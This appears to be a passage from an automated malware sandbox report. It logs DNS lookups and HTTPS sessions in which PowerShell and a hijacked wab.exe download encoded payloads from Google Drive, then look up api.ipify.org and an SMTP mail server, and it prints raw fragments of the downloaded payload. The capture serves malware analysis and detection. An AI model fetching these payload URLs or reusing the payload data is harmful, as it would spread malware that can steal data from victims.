                                                                                Apr 23, 2024 08:04:55.752640963 CEST1.1.1.1192.168.2.50x5f9eNo error (0)drive.usercontent.google.com142.250.64.97A (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:38.285391092 CEST1.1.1.1192.168.2.50x898eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:38.285391092 CEST1.1.1.1192.168.2.50x898eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:38.285391092 CEST1.1.1.1192.168.2.50x898eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                Apr 23, 2024 08:05:40.802134037 CEST1.1.1.1192.168.2.50x9c9bNo error (0)smtp.privateemail.com66.29.159.53A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • drive.google.com
                                                                                • drive.usercontent.google.com
                                                                                • api.ipify.org

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549705142.250.81.2384433012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-04-23 06:04:55 UTC215OUTGET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: drive.google.com
                                                                                Connection: Keep-Alive
                                                                                2024-04-23 06:04:55 UTC1582INHTTP/1.1 303 See Other
                                                                                Content-Type: application/binary
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Tue, 23 Apr 2024 06:04:55 GMT
                                                                                Location: https://drive.usercontent.google.com/download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                Content-Security-Policy: script-src 'nonce-QiZWw5t93QrzjoPyyAt6ZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Server: ESF
                                                                                Content-Length: 0
                                                                                X-XSS-Protection: 0
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Content-Type-Options: nosniff
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549706142.250.64.974433012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-04-23 06:04:56 UTC233OUTGET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: drive.usercontent.google.com
                                                                                Connection: Keep-Alive
                                                                                2024-04-23 06:04:56 UTC4752INHTTP/1.1 200 OK
                                                                                X-GUploader-UploadID: ABPtcPqNo3dRxIl-vrvGEPET-AOI9xMGC_yTMQ4ySp6HJa5L3uUEbQSr58r8k3WX0Oipet2Niyk
                                                                                Content-Type: application/octet-stream
                                                                                Content-Security-Policy: sandbox
                                                                                Content-Security-Policy: default-src 'none'
                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                X-Content-Security-Policy: sandbox
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Disposition: attachment; filename="Gubernatorial227.psd"
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Credentials: false
                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 432560
                                                                                Last-Modified: Mon, 22 Apr 2024 06:49:29 GMT
                                                                                Date: Tue, 23 Apr 2024 06:04:56 GMT
                                                                                Expires: Tue, 23 Apr 2024 06:04:56 GMT
                                                                                Cache-Control: private, max-age=0
                                                                                X-Goog-Hash: crc32c=jW83EA==
                                                                                Server: UploadServer
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close
                                                                                2024-04-23 06:04:56 UTC4752INData Raw: 36 77 4c 4e 76 4f 73 43 66 56 53 37 62 55 38 62 41 4f 73 43 4a 4e 4e 78 41 5a 73 44 58 43 51 45 36 77 4b 65 70 48 45 42 6d 37 6c 59 63 6d 51 43 36 77 4c 43 65 48 45 42 6d 34 48 78 77 30 77 33 4e 4f 73 43 31 77 4a 78 41 5a 75 42 38 5a 73 2b 55 7a 5a 78 41 5a 74 78 41 5a 76 72 41 6e 38 6d 36 77 4b 46 55 4c 71 52 6d 43 73 2f 36 77 4a 66 53 65 73 43 76 36 33 72 41 6f 72 67 63 51 47 62 4d 63 70 78 41 5a 76 72 41 6a 66 71 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 75 36 69 36 77 4a 75 53 49 48 35 55 38 4e 45 42 48 7a 4d 36 77 4a 44 70 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 77 46 50 72 41 69 62 35 67 63 4e 51 6d 45 30 44 36 77 4c 79 44 58 45 42 6d 37 72 6b 71 41 54 63 36 77 4b 51 50 6e 45
                                                                                Data Ascii: 6wLNvOsCfVS7bU8bAOsCJNNxAZsDXCQE6wKepHEBm7lYcmQC6wLCeHEBm4Hxw0w3NOsC1wJxAZuB8Zs+UzZxAZtxAZvrAn8m6wKFULqRmCs/6wJfSesCv63rAorgcQGbMcpxAZvrAjfqiRQLcQGbcQGb0eJxAZtxAZuDwQTrAu6i6wJuSIH5U8NEBHzM6wJDpXEBm4tEJARxAZtxAZuJw+sCwFPrAib5gcNQmE0D6wLyDXEBm7rkqATc6wKQPnE
                                                                                2024-04-23 06:04:56 UTC4752INData Raw: 32 6b 57 71 69 71 52 4b 71 35 36 41 53 74 46 44 41 65 72 78 72 73 55 55 71 6f 76 43 44 72 55 4d 51 45 74 6c 4f 78 4f 6b 36 66 36 43 37 56 30 70 41 73 74 43 6a 51 38 4a 32 63 30 37 70 6a 74 64 38 38 74 59 66 62 44 6a 6b 52 39 7a 30 38 53 34 4a 38 74 59 43 45 34 47 52 63 67 63 77 30 32 58 6e 74 65 53 52 76 70 66 72 64 38 70 62 4d 47 74 39 53 51 74 41 48 45 78 32 5a 4a 31 43 6f 74 4c 73 4b 34 6a 65 43 66 64 51 52 64 49 63 41 53 6f 72 54 39 31 32 70 36 57 66 78 72 50 53 48 5a 53 70 78 37 75 44 51 53 49 39 52 74 59 45 66 6f 56 44 58 61 70 6e 6f 41 61 45 33 46 7a 54 41 6d 72 50 5a 4d 4f 48 49 56 7a 65 52 4a 53 54 30 43 33 45 36 69 75 46 46 70 32 67 63 38 63 77 30 71 58 67 64 63 76 52 66 56 72 71 44 73 71 59 58 2b 70 6e 69 56 66 56 44 4a 52 59 74 44 58 72 38 6d
                                                                                Data Ascii: 2kWqiqRKq56AStFDAerxrsUUqovCDrUMQEtlOxOk6f6C7V0pAstCjQ8J2c07pjtd88tYfbDjkR9z08S4J8tYCE4GRcgcw02XnteSRvpfrd8pbMGt9SQtAHEx2ZJ1CotLsK4jeCfdQRdIcASorT912p6WfxrPSHZSpx7uDQSI9RtYEfoVDXapnoAaE3FzTAmrPZMOHIVzeRJST0C3E6iuFFp2gc8cw0qXgdcvRfVrqDsqYX+pniVfVDJRYtDXr8m
                                                                                2024-04-23 06:04:56 UTC444INData Raw: 63 56 43 41 56 78 4c 4c 51 69 6a 52 55 70 44 4a 48 4d 4e 4d 6c 34 2f 58 6b 30 7a 7a 52 69 45 4e 2f 48 65 38 4a 41 59 4c 47 72 59 35 5a 5a 4a 64 46 44 4d 72 41 33 56 32 6f 61 2b 66 56 6c 63 4b 74 65 4a 4a 6f 70 51 56 4c 31 58 5a 79 35 2b 36 76 6a 68 44 47 30 79 4a 31 77 34 68 66 4d 65 4f 2b 69 58 37 47 41 48 6c 34 65 4c 69 42 56 51 56 67 77 76 64 41 58 64 53 50 39 31 6d 59 61 51 4e 62 38 73 7a 50 38 44 6a 71 51 55 4a 6f 2f 4f 63 32 2f 38 53 57 6f 37 4c 68 37 70 47 71 30 78 73 43 64 2f 7a 6e 49 42 4b 45 51 33 43 55 54 77 66 63 72 4b 56 45 34 50 4c 51 52 33 4e 77 45 55 66 63 72 36 46 6b 69 59 59 2b 69 65 6a 63 51 32 50 41 59 75 52 79 6b 2b 69 4b 6c 39 2b 53 49 61 68 41 62 75 5a 34 39 59 42 4b 6c 38 58 57 36 41 54 30 39 59 69 66 59 46 42 4e 68 70 54 4e 4b 59
                                                                                Data Ascii: cVCAVxLLQijRUpDJHMNMl4/Xk0zzRiEN/He8JAYLGrY5ZZJdFDMrA3V2oa+fVlcKteJJopQVL1XZy5+6vjhDG0yJ1w4hfMeO+iX7GAHl4eLiBVQVgwvdAXdSP91mYaQNb8szP8DjqQUJo/Oc2/8SWo7Lh7pGq0xsCd/znIBKEQ3CUTwfcrKVE4PLQR3NwEUfcr6FkiYY+iejcQ2PAYuRyk+iKl9+SIahAbuZ49YBKl8XW6AT09YifYFBNhpTNKY
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 67 61 71 65 32 63 4d 75 39 6f 4a 4b 71 38 38 35 57 73 61 53 57 38 74 71 33 63 6e 73 64 42 39 78 52 4f 6b 2b 37 63 74 71 50 59 79 6e 67 38 6b 63 77 30 79 58 6a 39 65 53 52 76 35 72 32 44 49 52 55 31 49 68 46 44 47 37 57 57 6a 50 77 48 35 71 42 45 65 48 6e 51 77 49 4c 61 77 30 41 34 58 30 63 59 75 49 6d 48 55 2f 69 68 47 38 61 69 62 66 48 42 55 6c 76 78 44 44 48 58 34 64 70 42 70 32 45 71 2b 65 33 68 4d 69 5a 74 44 42 4c 76 61 43 53 71 75 52 67 4a 48 58 6e 6f 42 4b 71 35 37 50 64 49 48 71 6c 30 5a 75 42 2b 68 35 48 54 42 32 79 35 2b 36 48 79 6f 72 39 6b 7a 32 7a 6d 61 37 48 72 59 2f 2f 41 37 49 67 65 6d 34 52 63 71 4f 6b 6c 31 50 62 34 76 39 45 6e 71 47 4b 71 71 6b 34 2f 4e 43 79 78 30 55 6f 4b 51 74 53 68 39 48 55 73 50 6f 57 63 74 63 34 4d 36 54 7a 42 39
                                                                                Data Ascii: gaqe2cMu9oJKq885WsaSW8tq3cnsdB9xROk+7ctqPYyng8kcw0yXj9eSRv5r2DIRU1IhFDG7WWjPwH5qBEeHnQwILaw0A4X0cYuImHU/ihG8aibfHBUlvxDDHX4dpBp2Eq+e3hMiZtDBLvaCSquRgJHXnoBKq57PdIHql0ZuB+h5HTB2y5+6Hyor9kz2zma7HrY//A7Igem4RcqOkl1Pb4v9EnqGKqqk4/NCyx0UoKQtSh9HUsPoWctc4M6TzB9
                                                                                2024-04-23 06:04:56 UTC66INData Raw: 68 69 67 6c 59 76 6e 78 37 2f 50 2b 4a 62 51 44 32 6e 44 66 31 43 4e 2b 57 66 51 4d 72 32 6b 57 71 67 61 52 4b 71 35 36 41 53 75 37 69 63 4d 75 4b 57 35 30 33 75 42 75 30 36 4a 6b 35 45 77 69 45 76
                                                                                Data Ascii: higlYvnx7/P+JbQD2nDf1CN+WfQMr2kWqgaRKq56ASu7icMuKW503uBu06Jk5EwiEv
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 51 73 48 73 79 52 73 72 38 30 68 54 4b 64 4e 39 76 6b 49 72 73 79 58 4e 56 65 53 42 34 46 56 43 73 51 4b 79 7a 52 33 37 61 48 4e 4a 64 66 6a 6c 6e 73 65 74 4a 70 32 6f 6f 79 2b 68 45 72 38 49 64 5a 45 37 37 59 42 76 65 6a 51 71 34 73 71 61 63 6e 4e 7a 34 38 42 6a 51 2b 6e 64 45 33 35 41 67 6d 6f 6f 71 51 64 4c 4a 4a 4f 2b 31 35 2f 6c 51 55 68 79 42 52 6d 4f 6e 41 33 54 66 61 70 35 48 6b 79 38 6c 69 63 4a 6e 63 52 6e 74 2b 65 54 45 57 30 4f 59 50 37 30 6a 78 7a 41 2f 7a 55 6b 72 4d 57 45 79 69 77 30 38 30 66 66 6e 45 52 78 4c 6d 49 39 42 63 46 64 71 71 65 67 49 61 6a 74 56 45 67 35 59 54 44 62 4e 68 4c 70 35 42 78 56 4e 6a 74 77 77 32 67 48 6b 49 44 39 4e 6d 4c 58 4d 78 4f 6b 54 53 73 63 6d 57 48 6b 4f 32 4b 56 6b 36 50 50 33 65 64 52 69 44 54 6e 50 42 62
                                                                                Data Ascii: QsHsyRsr80hTKdN9vkIrsyXNVeSB4FVCsQKyzR37aHNJdfjlnsetJp2ooy+hEr8IdZE77YBvejQq4sqacnNz48BjQ+ndE35AgmooqQdLJJO+15/lQUhyBRmOnA3Tfap5Hky8licJncRnt+eTEW0OYP70jxzA/zUkrMWEyiw080ffnERxLmI9BcFdqqegIajtVEg5YTDbNhLp5BxVNjtww2gHkID9NmLXMxOkTSscmWHkO2KVk6PP3edRiDTnPBb
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 30 47 66 41 55 4d 75 4d 70 48 39 39 6d 75 6b 41 57 62 65 46 33 75 55 4c 45 2b 35 6b 64 53 4b 42 43 73 36 43 69 64 41 6b 2b 7a 52 54 55 4e 4c 2f 66 31 48 54 6d 38 55 31 48 33 59 38 70 79 57 79 48 42 55 76 53 6d 35 66 48 33 61 55 47 69 48 39 79 31 30 75 35 49 5a 62 48 30 59 65 4b 54 63 47 77 36 32 41 63 6b 55 45 44 64 2b 69 31 38 47 37 41 6c 4e 77 6a 48 4e 79 49 4c 35 44 47 57 57 54 4e 41 5a 42 76 38 37 4a 2b 4a 61 34 64 38 41 42 76 4e 42 68 72 70 68 59 6b 55 64 38 71 35 36 41 53 71 76 56 4e 56 59 2f 57 48 50 73 62 6e 6c 74 4a 72 6f 66 62 71 66 32 4d 50 6f 59 45 55 53 45 71 74 4d 66 63 6d 58 7a 43 48 44 4c 51 5a 34 4c 49 57 55 66 63 6c 6d 64 57 31 4c 4c 61 59 53 5a 65 6a 7a 50 48 4d 4e 4b 6e 35 48 58 7a 61 64 35 4f 61 52 71 70 76 62 63 76 34 41 4a 31 48 71
                                                                                Data Ascii: 0GfAUMuMpH99mukAWbeF3uULE+5kdSKBCs6CidAk+zRTUNL/f1HTm8U1H3Y8pyWyHBUvSm5fH3aUGiH9y10u5IZbH0YeKTcGw62AckUEDd+i18G7AlNwjHNyIL5DGWWTNAZBv87J+Ja4d8ABvNBhrphYkUd8q56ASqvVNVY/WHPsbnltJrofbqf2MPoYEUSEqtMfcmXzCHDLQZ4LIWUfclmdW1LLaYSZejzPHMNKn5HXzad5OaRqpvbcv4AJ1Hq
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 76 58 6b 72 4d 64 72 46 4f 6c 32 6a 56 66 68 53 53 77 59 39 4c 61 4b 69 41 53 71 75 65 67 44 74 64 2b 33 46 33 45 35 6e 38 50 44 6f 56 63 69 38 4c 4e 48 6b 6e 46 70 71 79 56 6d 78 36 6b 73 73 62 78 64 67 47 58 44 6f 6d 79 77 77 34 74 37 4f 4e 46 51 33 4f 71 35 36 41 38 44 79 5a 73 43 6e 37 4a 6a 6e 56 2b 39 6d 31 6e 63 67 56 50 57 65 51 70 6d 46 72 6e 6d 55 58 38 63 53 7a 59 67 33 71 4b 51 6c 61 55 75 6b 6d 46 6c 4a 48 31 51 4e 30 4c 41 4e 78 69 79 4d 51 37 4e 75 5a 43 57 38 37 78 6d 67 32 73 35 71 41 6f 2f 69 61 67 45 72 77 7a 44 70 75 79 59 62 76 79 31 6d 54 49 54 54 56 48 33 4b 71 7a 33 2b 57 79 31 6b 39 51 58 2f 4a 48 33 49 67 7a 43 7a 6c 48 54 63 58 5a 30 75 38 41 2b 62 50 5a 4f 53 4f 31 31 77 4b 48 41 4e 54 46 76 43 4c 61 6f 71 30 69 48 51 36 72 75
                                                                                Data Ascii: vXkrMdrFOl2jVfhSSwY9LaKiASquegDtd+3F3E5n8PDoVci8LNHknFpqyVmx6kssbxdgGXDomyww4t7ONFQ3Oq56A8DyZsCn7JjnV+9m1ncgVPWeQpmFrnmUX8cSzYg3qKQlaUukmFlJH1QN0LANxiyMQ7NuZCW87xmg2s5qAo/iagErwzDpuyYbvy1mTITTVH3Kqz3+Wy1k9QX/JH3IgzCzlHTcXZ0u8A+bPZOSO11wKHANTFvCLaoq0iHQ6ru
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 6d 4a 54 54 59 62 57 54 65 6c 58 75 64 71 71 64 47 2b 6e 64 4e 6f 70 61 45 45 50 64 67 62 6e 4b 63 52 37 52 37 65 75 42 78 52 2f 61 48 4c 52 7a 2f 31 64 47 59 31 34 4a 75 2f 61 45 4e 6c 39 50 69 39 69 6a 37 47 41 62 78 48 54 36 76 63 2f 53 43 4e 4e 76 70 63 41 62 77 43 48 46 6a 4d 4b 6d 6a 4c 48 58 2b 35 41 59 79 36 79 53 4c 57 2b 67 49 4a 71 36 71 76 48 58 4e 31 34 70 4e 53 6d 59 75 55 59 5a 58 47 78 5a 59 42 6a 52 71 4a 66 32 4e 46 46 7a 69 5a 4b 35 77 64 46 31 37 4b 58 46 68 61 43 4a 65 6e 32 53 77 75 52 74 37 4c 52 53 46 66 65 30 53 52 52 33 6a 4e 6e 6f 42 4b 71 35 37 51 56 39 59 57 2f 42 77 67 4b 35 35 49 71 35 37 6f 54 33 6d 67 4c 55 57 71 62 66 4a 4b 71 35 36 41 53 75 72 69 36 30 34 58 39 4f 70 33 72 6f 33 4f 4b 69 64 33 48 47 73 41 6e 69 42 70 34
                                                                                Data Ascii: mJTTYbWTelXudqqdG+ndNopaEEPdgbnKcR7R7euBxR/aHLRz/1dGY14Ju/aENl9Pi9ij7GAbxHT6vc/SCNNvpcAbwCHFjMKmjLHX+5AYy6ySLW+gIJq6qvHXN14pNSmYuUYZXGxZYBjRqJf2NFFziZK5wdF17KXFhaCJen2SwuRt7LRSFfe0SRR3jNnoBKq57QV9YW/BwgK55Iq57oT3mgLUWqbfJKq56ASuri604X9Op3ro3OKid3HGsAniBp4
                                                                                2024-04-23 06:04:56 UTC1255INData Raw: 68 50 31 46 39 42 4f 2b 69 63 43 4f 41 33 45 41 61 4d 30 42 4c 56 58 4b 6c 2f 70 67 57 74 69 41 61 4f 73 43 4f 57 74 4b 6c 38 37 75 5a 67 7a 30 39 59 69 66 59 6c 42 4e 71 5a 62 50 37 6e 70 32 61 52 77 44 76 37 7a 34 42 6b 7a 79 48 66 32 69 2b 4e 53 61 38 55 2b 4c 6b 54 62 63 6c 62 48 54 48 45 59 77 32 2f 36 46 4e 71 2f 43 6c 4a 52 53 36 73 65 44 43 37 50 6c 61 73 57 48 43 55 58 72 56 55 67 63 7a 56 31 70 46 6d 7a 4b 61 75 65 67 45 71 72 39 53 38 65 50 71 4a 6b 31 37 73 6e 52 73 4f 35 4f 71 49 4d 64 4c 64 51 69 6d 53 65 37 57 2f 4d 6c 4e 64 52 4e 4d 4a 45 74 4d 4b 48 6f 4d 44 5a 6d 56 68 59 68 4a 54 79 44 48 38 56 7a 56 59 52 64 2f 2b 72 43 33 5a 35 57 71 2b 65 6a 30 75 77 76 34 42 4b 71 35 36 41 41 34 53 56 67 42 64 68 4c 6d 78 72 53 73 45 39 32 52 30 58
                                                                                Data Ascii: hP1F9BO+icCOA3EAaM0BLVXKl/pgWtiAaOsCOWtKl87uZgz09YifYlBNqZbP7np2aRwDv7z4BkzyHf2i+NSa8U+LkTbclbHTHEYw2/6FNq/ClJRS6seDC7PlasWHCUXrVUgczV1pFmzKauegEqr9S8ePqJk17snRsO5OqIMdLdQimSe7W/MlNdRNMJEtMKHoMDZmVhYhJTyDH8VzVYRd/+rC3Z5Wq+ej0uwv4BKq56AA4SVgBdhLmxrSsE92R0X


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549714142.250.81.238443320C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-04-23 06:05:32 UTC216OUTGET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: drive.google.com
                                                                                Cache-Control: no-cache
                                                                                2024-04-23 06:05:32 UTC1582INHTTP/1.1 303 See Other
                                                                                Content-Type: application/binary
                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                Date: Tue, 23 Apr 2024 06:05:32 GMT
                                                                                Location: https://drive.usercontent.google.com/download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Security-Policy: script-src 'nonce-038IpTAFCB_-b11RPL3lCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                Server: ESF
                                                                                Content-Length: 0
                                                                                X-XSS-Protection: 0
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                X-Content-Type-Options: nosniff
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549715142.250.64.97443320C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-04-23 06:05:32 UTC258OUTGET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Cache-Control: no-cache
                                                                                Host: drive.usercontent.google.com
                                                                                Connection: Keep-Alive
                                                                                2024-04-23 06:05:33 UTC4747INHTTP/1.1 200 OK
                                                                                X-GUploader-UploadID: ABPtcPpBTAcRqQ10BE3SjgSH6VYu2EySsB4iY44h34ec1TDMsHboV7YV3oaSmyplbJDU1aO4C54
                                                                                Content-Type: application/octet-stream
                                                                                Content-Security-Policy: sandbox
                                                                                Content-Security-Policy: default-src 'none'
                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                X-Content-Security-Policy: sandbox
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Disposition: attachment; filename="YSJzfnnFD37.bin"
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Credentials: false
